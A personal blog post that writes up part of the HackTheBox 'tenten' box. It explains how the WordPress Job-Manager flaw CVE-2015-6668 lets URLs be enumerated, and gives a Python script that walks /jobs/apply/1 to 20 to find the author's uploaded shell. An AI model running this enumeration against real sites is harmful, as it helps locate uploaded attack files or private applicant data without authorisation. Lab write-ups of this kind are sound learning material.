WordPress Job-Manager CVE-2015-6668
- by Vince
Lately, I've been playing around on HackTheBox to expand my game. I find the platform to be challenging because the Capture the Flag style hacking is another world to me. I frequently see people writing "this is easy" when referring to a specific box or challenge but I think it's only easy if you know how to do "something". For example, I know next to nothing about steganography and when I came across an image with a hidden message, I had no idea what tool to use for the problem. But then you discover a tool like steghide and all of a sudden, it IS "easy" -- as they say. Moving on....
I've been working my way through some of the easier boxes in both the Active and Retired sections and my recent project is tenten, which is where I came across the WordPress Job-Manager vulnerability. As I've said previously, I'm a Python n00b but I learn from doing. This seemed like a great opportunity because I needed to parse through a bunch of pages -- grabbing the title from each page. Essentially, at this point in the process of working my way through this box, I'm trying to find my uploaded shell.
If you're not familiar with this box or vulnerability, here's a visual:
Note in the URL, we have /apply/1
We have an unknown number and somewhere we will find our uploaded shell. In the address bar, we could literally replace 1 with 2, then 2 with 3, etc., etc., or we could script this in Python. It's probably not pretty but it works:

    #!/usr/bin/python3
    import requests

    host = 'http://10.10.10.10/index.php/jobs/apply/'
    a = 0
    while a < 20:
        a += 1
        combined = host + str(a)
        r = requests.get(combined)
        # Iterating a Response yields 128-byte chunks (bytes), not text lines,
        # so the slice offsets below are relative to the chunk
        for line in r:
            if b"<title>" in line:
                # Keep only what comes before the dash separator in the title
                head, sep, tail = line.partition('–'.encode('utf-8'))
                print('Title' + str(a) + ': ' + head[96:116].decode('utf-8', 'replace'))

Our script will run through /apply/1 through /apply/20. It will search for the HTML <title> tag, it will start printing at 96 characters, end printing at 116 characters and it will terminate when it sees –. Our result is this:
Title20 is my shell and Title13 is a hint for those attempting this box. :)